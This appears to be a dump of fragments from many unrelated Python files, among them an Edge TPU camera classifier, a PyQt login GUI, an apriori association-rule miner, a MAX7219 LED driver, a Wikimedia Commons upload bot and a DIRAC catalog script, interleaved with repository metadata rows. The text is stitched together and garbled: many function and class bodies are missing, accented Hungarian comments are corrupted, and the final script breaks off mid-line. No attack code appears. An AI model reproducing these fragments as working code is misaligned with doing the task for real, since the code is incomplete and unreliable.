    previous = {entry[0] for entry in last_results}
    if len(current & previous) >= top_k:
        return False
    print('Difference detected')
    return True
def main():
    """Creates camera pipeline, and pushes pipeline through ClassificationEngine
    model. Logs results to user-defined storage. Runs either in training mode to
    gather images for custom model creation or in deterrent mode that sounds an
    'alarm' if a defined label is detected."""
    # NOTE(review): user_selections() and user_callback are not defined in the
    # visible portion of this file -- presumably an argparse helper and the
    # per-frame callback from the original project; confirm they exist upstream.
    args = user_selections()
    print("Loading %s with %s labels." % (args.model, args.labels))
    # Build the TFLite interpreter for the Edge TPU and load its label map.
    interpreter = make_interpreter(args.model)
    interpreter.allocate_tensors()
    labels = read_label_file(args.labels)
    # Sanity-check the model: input must be a single [1, H, W, C] image tensor.
    input_tensor_shape = interpreter.get_input_details()[0]['shape']
    if (input_tensor_shape.size != 4 or
            input_tensor_shape[0] != 1):
        raise RuntimeError(
            'Invalid input tensor shape! Expected: [1, height, width, channel]')
    # A classification model is expected to expose exactly one output tensor.
    output_tensors = len(interpreter.get_output_details())
    if output_tensors != 1:
        raise ValueError(
            # NOTE(review): missing space between the two concatenated string
            # literals -- the message renders as "...only!This model has ...".
            ('Classification model should have 1 output tensor only!'
            'This model has {}.'.format(output_tensors)))
    storage_dir = args.storage
    # Initialize logging file
    logging.basicConfig(filename='%s/results.log' % storage_dir,
                        format='%(asctime)s-%(message)s',
                        level=logging.DEBUG)
    last_time = time.monotonic()
    last_results = [('label', 0)]
    # Hand control to the GStreamer loop; user_callback is invoked per frame.
    gstreamer.run_pipeline(user_callback, videosrc=args.videosrc)
if __name__ == '__main__':
    # Full label-map entry used to identify squirrels.
    # NOTE(review): assigned but never passed to main() in the visible code --
    # presumably read as a global elsewhere; confirm before removing.
    FOX_SQUIRREL_LABEL = 'fox squirrel, eastern fox squirrel, Sciurus niger'
    main()
| 38.711656 | 94 | 0.666878 |
4906781740f98be4911b2335a3c4e24bb2089146 | 2,959 | py | Python | memory/test/test_memory.py | MaxGreil/hail | 4e0605b6bfd24a885a8194e8c0984b20994d3407 | [
"MIT"
] | 789 | 2016-09-05T04:14:25.000Z | 2022-03-30T09:51:54.000Z | memory/test/test_memory.py | MaxGreil/hail | 4e0605b6bfd24a885a8194e8c0984b20994d3407 | [
"MIT"
] | 5,724 | 2016-08-29T18:58:40.000Z | 2022-03-31T23:49:42.000Z | memory/test/test_memory.py | MaxGreil/hail | 4e0605b6bfd24a885a8194e8c0984b20994d3407 | [
"MIT"
] | 233 | 2016-08-31T20:42:38.000Z | 2022-02-17T16:42:39.000Z | import unittest
import uuid
from memory.client import MemoryClient
from hailtop.aiocloud.aiogoogle import GoogleStorageAsyncFS
from hailtop.config import get_user_config
from hailtop.utils import async_to_blocking
from gear.cloud_config import get_gcp_config
PROJECT = get_gcp_config().project
| 36.085366 | 111 | 0.663738 |
49078fb3338a8d88957f2187faa7b3d0420743af | 990 | py | Python | feladatok.py | python-feladatok-tesztekkel/-05-02-01-fuggvenyek-halado | 0528125ec429584b21a41635517a3c55dfba559a | [
"CC0-1.0"
] | null | null | null | feladatok.py | python-feladatok-tesztekkel/-05-02-01-fuggvenyek-halado | 0528125ec429584b21a41635517a3c55dfba559a | [
"CC0-1.0"
] | null | null | null | feladatok.py | python-feladatok-tesztekkel/-05-02-01-fuggvenyek-halado | 0528125ec429584b21a41635517a3c55dfba559a | [
"CC0-1.0"
] | null | null | null | # feladat.py
# 1. feladat
# rjon fggvnyt szokoev_e nven
# A fggvny trjen vissza igaz rtkkel, ha a paramterben megadott vszm szkv
# 2. feladat
# A fggvny bemen paramterei az a, b, c egsz szmok
# rjon kdot amely eredmnyeknt az a vltozba lesz a legnagyobb szm, a b vltozba a msodik legnagyobb szm s a c vltozba pedig a legkisebb szm.
# 3. feladat
# Ksztsen palindrom-e nev fggvnyt amely egy stringrl megllaptja, hogy palidrom-e
# Tgabb rtelembe a palindrom olyan szveg vagy szkapcsolat, amely visszafel olvasva is ugyanaz
# 4. feladat
# rjon fggvnyt amely meghatrozza, hogy egy adott intervallumban hny ngyzetszm van
# Pl. [1-9] intervallum esetn 1, 2, 3 ngyzetei esnek, teht hrom ngyzetszm van
| 28.285714 | 153 | 0.756566 |
0b2242c98f153e44bcbb14ec8721042c75e0511e | 76 | py | Python | bin/pymodules/objectedit/__init__.py | mattire/naali | 28c9cdc84c6a85e0151a222e55ae35c9403f0212 | [
"Apache-2.0"
] | 1 | 2018-04-02T15:38:10.000Z | 2018-04-02T15:38:10.000Z | bin/pymodules/objectedit/__init__.py | mattire/naali | 28c9cdc84c6a85e0151a222e55ae35c9403f0212 | [
"Apache-2.0"
] | null | null | null | bin/pymodules/objectedit/__init__.py | mattire/naali | 28c9cdc84c6a85e0151a222e55ae35c9403f0212 | [
"Apache-2.0"
] | null | null | null | #from editgui import EditGUI
#from only_layout import OnlyLayout as EditGUI
| 25.333333 | 46 | 0.842105 |
0b24417f2ee0b6b95e1c21f1f50ee2435fb6de2e | 1,210 | py | Python | audiomate/processing/pipeline/onset.py | CostanzoPablo/audiomate | 080402eadaa81f77f64c8680510a2de64bc18e74 | [
"MIT"
] | 133 | 2018-05-18T13:54:10.000Z | 2022-02-15T02:14:20.000Z | audiomate/processing/pipeline/onset.py | CostanzoPablo/audiomate | 080402eadaa81f77f64c8680510a2de64bc18e74 | [
"MIT"
] | 68 | 2018-06-03T16:42:09.000Z | 2021-01-29T10:58:30.000Z | audiomate/processing/pipeline/onset.py | CostanzoPablo/audiomate | 080402eadaa81f77f64c8680510a2de64bc18e74 | [
"MIT"
] | 37 | 2018-11-02T02:40:29.000Z | 2021-11-30T07:44:50.000Z | import librosa
import numpy as np
from . import base
from . import spectral
| 31.025641 | 104 | 0.686777 |
0b24c9c12856cb1232066c7941cc8a2db9d6f09f | 2,496 | py | Python | friction_ramp_analysis/classes/callForceRampGUI.py | JSotres/AFM-Friction-Ramp-Analysis | d663134f148575f09e2991186c991ed00598ab5e | [
"MIT"
] | null | null | null | friction_ramp_analysis/classes/callForceRampGUI.py | JSotres/AFM-Friction-Ramp-Analysis | d663134f148575f09e2991186c991ed00598ab5e | [
"MIT"
] | null | null | null | friction_ramp_analysis/classes/callForceRampGUI.py | JSotres/AFM-Friction-Ramp-Analysis | d663134f148575f09e2991186c991ed00598ab5e | [
"MIT"
] | null | null | null | from PyQt5.QtWidgets import QMainWindow, QApplication, QFileDialog
import sys
from .readNanoscopeForceRamps import *
import matplotlib.pyplot as plt
from ..qt5_ui_files.ForceRampGUI import *
from matplotlib.backends.backend_qt5agg import (NavigationToolbar2QT as NavigationToolbar)
import os
import math
from ..qt5_ui_files.mplwidget1plot import mplwidget1plot
| 35.657143 | 105 | 0.733574 |
0b28b47566a0388433df755a312dddf760b4c430 | 1,250 | py | Python | onebarangay_psql/users/tests/test_admin.py | PrynsTag/oneBarangay-PostgreSQL | 11d7b97b57603f4c88948905560a22a5314409ce | [
"Apache-2.0"
] | null | null | null | onebarangay_psql/users/tests/test_admin.py | PrynsTag/oneBarangay-PostgreSQL | 11d7b97b57603f4c88948905560a22a5314409ce | [
"Apache-2.0"
] | 43 | 2022-02-07T00:18:35.000Z | 2022-03-21T04:42:48.000Z | onebarangay_psql/users/tests/test_admin.py | PrynsTag/oneBarangay-PostgreSQL | 11d7b97b57603f4c88948905560a22a5314409ce | [
"Apache-2.0"
] | null | null | null | """Create your tests for the admin app here."""
import pytest
from django.contrib.auth import get_user_model
from django.urls import reverse
pytestmark = pytest.mark.django_db
User = get_user_model()
| 33.783784 | 79 | 0.668 |
0b296cbeff42f183e0f9446e0c1d52f582289ecd | 1,129 | py | Python | neuroscout/resources/dataset.py | jdkent/neuroscout | 67aaafdf883988e2048197dc9ce4559a28e3b7b6 | [
"BSD-3-Clause"
] | 5 | 2018-07-16T16:23:21.000Z | 2021-08-20T15:43:23.000Z | neuroscout/resources/dataset.py | jdkent/neuroscout | 67aaafdf883988e2048197dc9ce4559a28e3b7b6 | [
"BSD-3-Clause"
] | 719 | 2018-07-09T17:19:57.000Z | 2022-03-30T15:30:59.000Z | neuroscout/resources/dataset.py | jdkent/neuroscout | 67aaafdf883988e2048197dc9ce4559a28e3b7b6 | [
"BSD-3-Clause"
] | 9 | 2019-07-10T17:45:31.000Z | 2021-08-30T21:51:21.000Z | from flask_apispec import MethodResource, marshal_with, doc, use_kwargs
from webargs import fields
from ..models import Dataset
from ..core import cache
from .utils import first_or_404
from ..schemas.dataset import DatasetSchema
| 35.28125 | 75 | 0.680248 |
0b2a468542d7634a98be235c3eb2a43a90a6aa6a | 2,194 | py | Python | tests/test_measures.py | lanxuedang/TIGER | a134b49f9c64321cb521a25953f9771ced9b597e | [
"MIT"
] | 88 | 2020-06-11T03:14:30.000Z | 2022-03-21T07:36:36.000Z | tests/test_measures.py | lanxuedang/TIGER | a134b49f9c64321cb521a25953f9771ced9b597e | [
"MIT"
] | 4 | 2021-04-29T19:22:08.000Z | 2021-09-22T19:22:48.000Z | tests/test_measures.py | lanxuedang/TIGER | a134b49f9c64321cb521a25953f9771ced9b597e | [
"MIT"
] | 13 | 2020-06-14T14:19:01.000Z | 2022-02-17T22:50:41.000Z | import numpy as np
from graph_tiger.graphs import o4_graph, p4_graph, c4_graph, k4_1_graph, k4_2_graph
from graph_tiger.graphs import two_c4_0_bridge, two_c4_1_bridge, two_c4_2_bridge, two_c4_3_bridge
from graph_tiger.measures import run_measure
if __name__ == '__main__':
main()
| 42.192308 | 97 | 0.591613 |
0b303fe60108c7d81edf13f0852f1b122917c330 | 13,679 | py | Python | AuroraAppCode/login.py | zahraahhajhsn/automatic-student-counter | 9b3e38f41aba3fbc59e1ccdaeae9ba229415f977 | [
"Apache-2.0"
] | null | null | null | AuroraAppCode/login.py | zahraahhajhsn/automatic-student-counter | 9b3e38f41aba3fbc59e1ccdaeae9ba229415f977 | [
"Apache-2.0"
] | null | null | null | AuroraAppCode/login.py | zahraahhajhsn/automatic-student-counter | 9b3e38f41aba3fbc59e1ccdaeae9ba229415f977 | [
"Apache-2.0"
] | null | null | null |
import verifyController
import pyodbc
from PyQt5.QtWidgets import QMessageBox
from PyQt5 import QtCore, QtGui, QtWidgets
from PySide2.QtCore import (QCoreApplication, QMetaObject,QSize,Qt)
from PySide2.QtGui import (QCursor, QFont,QIcon)
from PySide2.QtWidgets import *
from PySide2 import QtCore, QtGui, QtWidgets
import cameras
import pickle
import smtplib
from random import randint
import PyQt5
if __name__ == "__main__":
    # Standard Qt bootstrap: create the application, build the main window,
    # attach the generated UI, and enter the event loop.
    import sys
    app = QtWidgets.QApplication(sys.argv)
    LoginWindow = QtWidgets.QMainWindow()
    # Ui_LoginWindow is not defined in the visible part of this file --
    # presumably a Qt-Designer-generated class declared above; confirm.
    ui = Ui_LoginWindow()
    ui.setupUi(LoginWindow)
    LoginWindow.show()
    # exec_() blocks until the window closes; its status is forwarded to exit.
    sys.exit(app.exec_())
| 52.209924 | 238 | 0.59288 |
0b306e809cb7c5ad319eabca404494268373c70e | 13,195 | py | Python | ml/association/apriori.py | thorwhalen/ut | 353a4629c35a2cca76ef91a4d5209afe766433b4 | [
"MIT"
] | 4 | 2016-12-17T20:06:10.000Z | 2021-11-19T04:45:29.000Z | ml/association/apriori.py | thorwhalen/ut | 353a4629c35a2cca76ef91a4d5209afe766433b4 | [
"MIT"
] | 11 | 2021-01-06T05:35:11.000Z | 2022-03-11T23:28:31.000Z | ml/association/apriori.py | thorwhalen/ut | 353a4629c35a2cca76ef91a4d5209afe766433b4 | [
"MIT"
] | 3 | 2015-06-12T10:44:16.000Z | 2021-07-26T18:39:47.000Z | """Association mining -- apriori algo"""
__author__ = 'thor'
from numpy import *
# Modified from:
# Everaldo Aguiar & Reid Johnson (https://github.com/cse40647/cse40647/blob/sp.14/10%20-%20Apriori.ipynb)
#
# Itself Modified from:
# Marcel Caraciolo (https://gist.github.com/marcelcaraciolo/1423287)
#
# Functions to compute and extract association rules from a given frequent
# itemset generated by the Apriori algorithm.
import pandas as pd
from statsmodels.stats.proportion import samplesize_confint_proportion
def apriori(dataset, min_support=0.5, verbose=False):
    """Mine all frequent itemsets of a transaction database (Apriori).

    Starting from the frequent 1-itemsets, every round k joins the frequent
    (k-1)-itemsets into candidate k-itemsets and discards those below the
    support threshold, stopping as soon as a round yields nothing.

    Parameters
    ----------
    dataset : list
        The dataset (a list of transactions) from which to generate
        candidate itemsets.
    min_support : float
        The minimum support threshold. Defaults to 0.5.
    verbose : bool
        When True, print every frequent itemset with its support.

    Returns
    -------
    F : list
        The list of frequent itemsets, grouped by cardinality
        (element 0 holds the 1-itemsets).
    support_data : dict
        The support data for all candidate itemsets.

    References
    ----------
    .. [1] R. Agrawal, R. Srikant, "Fast Algorithms for Mining Association
           Rules", 1994.
    """
    transactions = list(map(set, dataset))
    # Frequent 1-itemsets seed the level-wise search.
    frequent_1, support_data = support_prune(
        transactions, create_candidates(dataset), min_support, verbose=False)
    frequent = [frequent_1]
    k = 2
    # Keep joining and pruning until a level comes back empty.
    while frequent[k - 2]:
        candidates_k = apriori_gen(frequent[k - 2], k)
        level_k, level_support = support_prune(transactions, candidates_k, min_support)
        support_data.update(level_support)
        frequent.append(level_k)
        k += 1
    if verbose:
        # Dump every frequent itemset with its support value.
        for level in frequent:
            for itemset in level:
                members = "".join(str(i) + ", " for i in iter(itemset)).rstrip(', ')
                print("{" + members + "}" + ": sup = " + str(round(support_data[itemset], 3)))
    return frequent, support_data
def create_candidates(dataset, verbose=False):
    """Creates a list of candidate 1-itemsets from a list of transactions.

    Parameters
    ----------
    dataset : list
        The dataset (a list of transactions) from which to generate candidate
        itemsets.
    verbose : bool
        If True, print the candidate items. Defaults to False.

    Returns
    -------
    list
        The candidate 1-itemsets, each wrapped in a frozenset (a set that is
        immutable and hashable, so it can key a dictionary), sorted by item.
    """
    seen = set()   # O(1) membership test (was an O(n) `[item] in c1` list scan)
    items = []     # unique items, in first-seen order
    for transaction in dataset:
        for item in transaction:
            if item not in seen:
                seen.add(item)
                items.append(item)
    items.sort()
    if verbose:
        # Print a list of all the candidate items.
        print(("" \
            + "{" \
            + "".join(str(i) + ", " for i in items).rstrip(', ') \
            + "}"))
    # Map each item to a frozenset because it will be the key of a dictionary.
    return [frozenset([item]) for item in items]
def support_prune(dataset, candidates, min_support, verbose=False):
    """Filter candidate itemsets by a minimum support threshold.

    By the apriori principle, if an itemset is frequent then all of its
    subsets are too; support-based pruning therefore controls the
    exponential growth of candidate itemsets between iterations.

    Parameters
    ----------
    dataset : list
        The transactions (each a set of items) to count support against.
    candidates : frozenset
        The list of candidate itemsets.
    min_support : float
        The minimum support threshold.
    verbose : bool
        If True, print the surviving itemsets and all support values.

    Returns
    -------
    retlist : list
        The candidate itemsets that meet the threshold.
    support_data : dict
        The support data for all counted candidate itemsets.
    """
    counts = {}  # support counts per candidate itemset
    for transaction in dataset:
        for candidate in candidates:
            if candidate.issubset(transaction):
                counts[candidate] = counts.get(candidate, 0) + 1
    total = float(len(dataset))  # total number of transactions
    retlist = []       # itemsets that survive pruning
    support_data = {}  # support for every counted itemset
    for itemset, count in counts.items():
        # Support of `itemset` = fraction of transactions containing it.
        support = count / total
        if support >= min_support:
            retlist.insert(0, itemset)
        support_data[itemset] = support
    if verbose:
        # Print a list of the pruned itemsets.
        for kept in retlist:
            for item in kept:
                print("{" + str(item) + "}")
        print("")
        for itemset in counts:
            label = "".join(str(i) + ", " for i in itemset).rstrip(", ")
            print("{" + label + "}" + ": sup = " + str(support_data[itemset]))
    return retlist, support_data
def apriori_gen(freq_sets, k):
    """Generates candidate itemsets (via the F_k-1 x F_k-1 method).

    A pair of frequent (k-1)-itemsets is merged only when their first k-2
    items (after sorting) are identical, which guarantees the union has
    exactly k items and avoids generating duplicates.

    Parameters
    ----------
    freq_sets : list
        The list of frequent (k-1)-itemsets.
    k : integer
        The cardinality of the current itemsets being evaluated.

    Returns
    -------
    list
        The list of merged candidate k-itemsets.
    """
    merged = []
    count = len(freq_sets)
    for left in range(count):
        # Prefix of the left itemset is loop-invariant; compute it once.
        prefix_left = sorted(freq_sets[left])[:k - 2]
        for right in range(left + 1, count):
            prefix_right = sorted(freq_sets[right])[:k - 2]
            if prefix_left == prefix_right:
                # Identical (k-2)-prefixes: merge the two itemsets.
                merged.append(freq_sets[left] | freq_sets[right])
    return merged
def rules_from_conseq(freq_set, H, support_data, rules, min_confidence=0.5, verbose=False):
    """Generates a set of candidate rules.

    Recursively evaluates rules whose consequents grow by one item per
    level, appending every rule above the confidence threshold to `rules`
    in place.

    Parameters
    ----------
    freq_set : frozenset
        The frequent itemset the rules are drawn from.
    H : list
        A list of candidate consequents (itemsets of a particular length).
    support_data : dict
        The support data for all candidate itemsets.
    rules : list
        A potentially incomplete set of candidate rules above the minimum
        confidence threshold; accepted rules are appended in place.
    min_confidence : float
        The minimum confidence threshold. Defaults to 0.5.
    verbose : bool
        If True, print each rule that is kept.
    """
    m = len(H[0])
    if m == 1:
        # Evaluate single-item consequents first (side effect: appends the
        # accepted rules). The pruned list is intentionally not reused for
        # candidate generation below, matching the original behaviour.
        calc_confidence(freq_set, H, support_data, rules, min_confidence, verbose)
    if (len(freq_set) > (m + 1)):
        Hmp1 = apriori_gen(H, m + 1)  # consequents one item larger
        Hmp1 = calc_confidence(freq_set, Hmp1, support_data, rules,
                               min_confidence, verbose)
        # BUG FIX: this check previously sat outside the len(freq_set) guard,
        # so a recursive call that could not grow the consequents (i.e.
        # len(freq_set) == m + 1) raised UnboundLocalError on `Hmp1`. It now
        # runs only when Hmp1 was actually generated, which also removes a
        # potential unbounded recursion on the m == 1 path.
        if len(Hmp1) > 1:
            # Candidate rules survived; recurse on them with larger consequents.
            rules_from_conseq(freq_set, Hmp1, support_data, rules,
                              min_confidence, verbose)
def calc_confidence(freq_set, H, support_data, rules, min_confidence=0.5, verbose=False):
    """Evaluates the generated rules.

    The confidence of a rule 'P implies H' (P -> H) is support(P|H) divided
    by support(P), where | denotes set union; here `freq_set` plays the role
    of P|H and each element of `H` is a candidate consequent. Rules meeting
    `min_confidence` are appended to `rules` in place as
    (antecedent, consequent, confidence) tuples.

    Parameters
    ----------
    freq_set : frozenset
        The frequent itemset the rules are drawn from.
    H : list
        A list of candidate consequents (itemsets of a particular length).
    support_data : dict
        The support data for all candidate itemsets.
    rules : list
        A potentially incomplete set of candidate rules above the minimum
        confidence threshold; accepted rules are appended in place.
    min_confidence : float
        The minimum confidence threshold. Defaults to 0.5.
    verbose : bool
        If True, print each accepted rule.

    Returns
    -------
    pruned_H : list
        The consequents whose rules met the confidence threshold.
    """
    pruned_H = []
    for conseq in H:
        antecedent = freq_set - conseq
        conf = support_data[freq_set] / support_data[antecedent]
        if conf >= min_confidence:
            rules.append((antecedent, conseq, conf))
            pruned_H.append(conseq)
            if verbose:
                lhs = "".join(str(i) + ", " for i in antecedent).rstrip(", ")
                rhs = "".join(str(i) + ", " for i in conseq).rstrip(", ")
                print("{" + lhs + "}" + " ---> " + "{" + rhs + "}"
                      + ": conf = " + str(round(conf, 3))
                      + ", sup = " + str(round(support_data[freq_set], 3)))
    return pruned_H
def generate_rules(F, support_data, min_confidence=0.5, verbose=True):
    """Generates a set of candidate rules from a list of frequent itemsets.

    For each frequent itemset, we calculate the confidence of using a
    particular item as the rule consequent (right-hand-side of the rule). By
    testing and merging the remaining rules, we recursively create a list of
    pruned rules.

    Parameters
    ----------
    F : list
        A list of frequent itemsets, grouped by cardinality (F[0] holds the
        1-itemsets).
    support_data : dict
        The corresponding support data for the frequent itemsets (L).
    min_confidence : float
        The minimum confidence threshold. Defaults to 0.5.
    verbose : bool
        If True, print each accepted rule. Defaults to True (note: the other
        functions in this module default verbose to False).

    Returns
    -------
    rules : list
        The list of candidate rules above the minimum confidence threshold,
        as (antecedent, consequent, confidence) tuples.
    """
    rules = []
    # Start at F[1]: 1-itemsets (F[0]) cannot be split into a rule.
    for i in range(1, len(F)):
        for freq_set in F[i]:
            # Initial candidate consequents: each single item of the itemset.
            H1 = [frozenset([itemset]) for itemset in freq_set]
            if (i > 1):
                # Itemsets of size >= 3: consequents can grow recursively.
                rules_from_conseq(freq_set, H1, support_data, rules, min_confidence, verbose)
            else:
                # 2-itemsets: only single-item consequents are possible.
                calc_confidence(freq_set, H1, support_data, rules, min_confidence, verbose)
    return rules
| 35.093085 | 117 | 0.617582 |
0b3087eb0d5de6a063260501def92d99d71d6436 | 397 | py | Python | setup.py | TechAtNYU/api-python | 26cfa78208f30c41095484422cd1232aeddbfcb2 | [
"MIT"
] | null | null | null | setup.py | TechAtNYU/api-python | 26cfa78208f30c41095484422cd1232aeddbfcb2 | [
"MIT"
] | null | null | null | setup.py | TechAtNYU/api-python | 26cfa78208f30c41095484422cd1232aeddbfcb2 | [
"MIT"
] | null | null | null | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
# Package metadata for the Tech@NYU API Python client (pytnyu); the only
# runtime dependency is `requests`.
setup(
    description='Tech@NYU API Python Client',
    author='TechatNYU',
    url='https://github.com/TechAtNYU/pytnyu',
    author_email='hello@techatnyu.org',
    version='0.0.4',
    install_requires=['requests'],
    namespace_packages=['pytnyu'],
    packages=['pytnyu'],
    name='pytnyu',
)
| 23.352941 | 46 | 0.677582 |
0b36a23da3938dd6a58c332d22bc21433cd520a7 | 2,949 | py | Python | hardware/max7219.py | gcurtis79/letsrobot | 0cb5fae07392ee3661036d138d8986c9705bcf0c | [
"Apache-2.0"
] | 26 | 2018-09-27T17:27:30.000Z | 2022-03-04T20:37:18.000Z | hardware/max7219.py | gcurtis79/letsrobot | 0cb5fae07392ee3661036d138d8986c9705bcf0c | [
"Apache-2.0"
] | 30 | 2018-10-15T03:54:58.000Z | 2020-05-28T06:57:08.000Z | hardware/max7219.py | gcurtis79/letsrobot | 0cb5fae07392ee3661036d138d8986c9705bcf0c | [
"Apache-2.0"
] | 16 | 2018-10-04T03:16:43.000Z | 2021-04-25T06:59:49.000Z | import spidev
# Register addresses 0x1-0x8 -- presumably the eight digit/row registers of
# the MAX7219 driver (per the module name); confirm against the datasheet.
columns = [0x1,0x2,0x3,0x4,0x5,0x6,0x7,0x8]
# 8-byte patterns, one byte per row. Names suggest full-on/off screens and
# emote faces; orientation depends on the wiring -- TODO confirm.
LEDOn = [0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF]
LEDOff = [0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0]
LEDEmoteSmile = [0x0,0x0,0x24,0x0,0x42,0x3C,0x0,0x0]
LEDEmoteSad = [0x0,0x0,0x24,0x0,0x0,0x3C,0x42,0x0]
LEDEmoteTongue = [0x0,0x0,0x24,0x0,0x42,0x3C,0xC,0x0]
LEDEmoteSurprise = [0x0,0x0,0x24,0x0,0x18,0x24,0x24,0x18]
# SPI handle (spidev.SpiDev); None until opened elsewhere in the module.
spi = None
| 25.205128 | 57 | 0.617158 |
0b36b0a444f2d74d0736b72d8524d171de6f01c9 | 9,236 | py | Python | kkl_wikicommons_upload.py | wmilbot/wikiscraper | c0e8c2ac45bcb275584fa6606c604ee7c9c9cea7 | [
"MIT"
] | 3 | 2018-11-14T14:06:09.000Z | 2018-11-14T18:23:16.000Z | kkl_wikicommons_upload.py | wmilbot/wikiscraper | c0e8c2ac45bcb275584fa6606c604ee7c9c9cea7 | [
"MIT"
] | null | null | null | kkl_wikicommons_upload.py | wmilbot/wikiscraper | c0e8c2ac45bcb275584fa6606c604ee7c9c9cea7 | [
"MIT"
] | 2 | 2018-11-14T14:06:23.000Z | 2019-09-22T08:25:55.000Z | #!/usr/bin/env python
from datapackage_pipelines.wrapper import ingest, spew
import logging, collections
from pipeline_params import get_pipeline_param_rows
from google.cloud import storage
from contextlib import contextmanager
from tempfile import mkdtemp
import os
import pywikibot
import time
from pywikibot.pagegenerators import GeneratorFactory
import datetime
from pywikibot.specialbots import UploadRobot
from pywikibot.data.api import APIError
import sys
from datapackage import Package
LICENSE_TEMPLATE = "PD-Israel"
SUPPORTED_TEMPLATE = "Supported by Wikimedia Israel|year=2018"
FILES_CATEGORY = "Files from JNF uploaded by Wikimedia Israel"
FILES_CATEGORY_ID = "Files_from_JNF_uploaded_by_Wikimedia_Israel"
DESCRIPTION_TEMPLATE=lambda description, datestring, source, author, jnfnum: """=={{int:filedesc}}==
{{Information
|description={{he|1=__DESCRIPTION__}}
|date=__DATESTRING__
|source={{he|1=__SOURCE__}}
|author={{he|1=__AUTHOR__}}
|permission=
|other versions=
|other fields={{Information field|Name=JNF Number|Value=__JNFNUM__}}
}}
=={{int:license-header}}==
{{__LICENSE__}}
{{__SUPPORTED__}}
[[Category:__FILESCAT__]]""".replace("__DATESTRING__", datestring) \
.replace("__SOURCE__", source) \
.replace("__AUTHOR__", author) \
.replace("__JNFNUM__", jnfnum) \
.replace("__DESCRIPTION__", description) \
.replace("__LICENSE__", LICENSE_TEMPLATE) \
.replace("__SUPPORTED__", SUPPORTED_TEMPLATE) \
.replace("__FILESCAT__", FILES_CATEGORY) \
def delete_page(page):
    """Delete a wiki page created by the bot (used for duplicated images).

    `prompt=True` asks for confirmation and `mark=True` tags the page for
    deletion when the account lacks delete rights.
    """
    # `throttle` paces the API calls. NOTE(review): it is not defined in this
    # fragment -- confirm it is a context manager defined elsewhere in the file.
    with throttle():
        page.delete(reason="Deleting duplicated images created by bot", prompt=True, mark=True)
def get_gcs_bucket(consts):
    """Return the Google Cloud Storage bucket the images are uploaded from.

    :param consts: mapping with keys "gcs_bucket" (bucket name) and
        "gcs_secret_file" (path to a service-account JSON key file).
    """
    logging.info("uploading from google storage bucket {}".format(consts["gcs_bucket"]))
    gcs = storage.Client.from_service_account_json(consts["gcs_secret_file"])
    return gcs.get_bucket(consts["gcs_bucket"])
def init_stats():
    """Return a fresh counters dict for an upload run, all values zeroed.

    The keys record why candidate images were accepted or skipped; they are
    incremented elsewhere (e.g. by is_valid_row()). A dict literal replaces
    the previous eight separate assignments.
    """
    return {
        "num eligible for download": 0,
        "invalid resolution": 0,
        "invalid description": 0,
        "invalid source": 0,
        "invalid year": 0,
        "in skip list": 0,
        "skipped start at": 0,
        "invalid image_path": 0,
    }
def get_donum_from_row(row):
    """Extract the JNF "Do" number from a row's archive image path."""
    stripped = row["image_path"].replace("/ArchiveTazlumim/TopSmlPathArc/Do", "")
    return stripped.replace(".jpeg", "")
def is_valid_row(row, stats):
    """Decide whether a scraped image row is eligible for download/upload.

    Each rejection increments the matching counter in `stats` (in place) and
    logs the reason; an accepted row bumps "num eligible for download".
    Returns True when the row passes every check, False otherwise.
    """
    # Guard clauses, checked in the same order as before: resolution,
    # description length, source length, year cutoff, path sanity.
    if row["width_px"] * row["height_px"] < 200 * 200:
        stats["invalid resolution"] += 1
        logging.info('invalid resolution: {} X {}'.format(row["width_px"], row["height_px"]))
        return False
    if len(row["description"]) < 3:
        stats["invalid description"] += 1
        logging.info('invalid description: {}'.format(row["description"]))
        return False
    if len(row["source"]) < 2:
        stats["invalid source"] += 1
        logging.info('invalid source: {}'.format(row["source"]))
        return False
    if row["date"].year > 1947:
        stats["invalid year"] += 1
        logging.info('invalid year: {}'.format(row["date"]))
        return False
    if 'mi:' in row['image_path']:
        stats['invalid image_path'] += 1
        logging.info('invalid image path: {}'.format(row['image_path']))
        return False
    stats["num eligible for download"] += 1
    return True
# def load_datapackage_resources(resources, stats):
# logging.info("Loading datapackage resources...")
# donums = {}
# start_at_donum = False
# reached_start_at = False
# for resource in resources:
# for row_num, row in enumerate(resource, start=1):
# donum = get_donum_from_row(row)
# if start_at_donum and not reached_start_at and donum != start_at_donum:
# stats["skipped start at"] += 1
# elif is_valid_row(row, stats):
# if start_at_donum and donum == start_at_donum:
# reached_start_at = True
# donums[donum] = row
# stats["num eligible for download"] += 1
# return donums
# Entry dispatch: run the interactive CLI when invoked with --cli, otherwise
# run as a datapackage-pipelines processor.
# NOTE(review): `cli` and `ingest_spew` are not visible in this fragment --
# presumably defined elsewhere in the full file; confirm.
if len(sys.argv) > 1 and sys.argv[1] == '--cli':
    cli()
else:
    ingest_spew()
| 37.092369 | 110 | 0.612711 |
0b373158f05135f2dafba65a6ba39cdf0ba87c6d | 1,348 | py | Python | Badger/scripts/besdirac-wms-decaycard-get.py | zhangxt-ihep/IHEPDIRAC | fb53500a998adc43ff0c65c02caf492da2965de5 | [
"MIT"
] | null | null | null | Badger/scripts/besdirac-wms-decaycard-get.py | zhangxt-ihep/IHEPDIRAC | fb53500a998adc43ff0c65c02caf492da2965de5 | [
"MIT"
] | 1 | 2021-03-04T08:48:38.000Z | 2021-03-04T08:48:38.000Z | Badger/scripts/besdirac-wms-decaycard-get.py | zhangxt-ihep/IHEPDIRAC | fb53500a998adc43ff0c65c02caf492da2965de5 | [
"MIT"
] | 2 | 2020-08-26T06:36:51.000Z | 2021-03-04T08:08:34.000Z | #!/usr/bin/env python
import DIRAC
from DIRAC import S_OK, S_ERROR
from DIRAC.Core.Base import Script
Script.setUsageMessage( """
Insert random trigger file into the File Catalog
Usage:
%s [option] lfn
""" % Script.scriptName )
fcType = 'FileCatalog'
Script.parseCommandLine( ignoreErrors = False )
options = Script.getUnprocessedSwitches()
args = Script.getPositionalArgs()
from DIRAC.Interfaces.API.Dirac import Dirac
dirac = Dirac()
from DIRAC.Resources.Catalog.FileCatalogClient import FileCatalogClient
fccType = 'DataManagement/FileCatalog'
fcc = FileCatalogClient(fccType)
def getMeta(lfn, metaname):
    '''Return the value of directory metadata field `metaname` for `lfn`.

    Queries the module-level DIRAC File Catalog client (`fcc`). Returns None
    implicitly when the query fails (after printing the error message) or
    when the field is not set on the directory.
    '''
    result = fcc.getDirectoryMetadata(lfn)
    if not result['OK']:
        # `print(x)` works on Python 2 and 3 alike; the previous bare
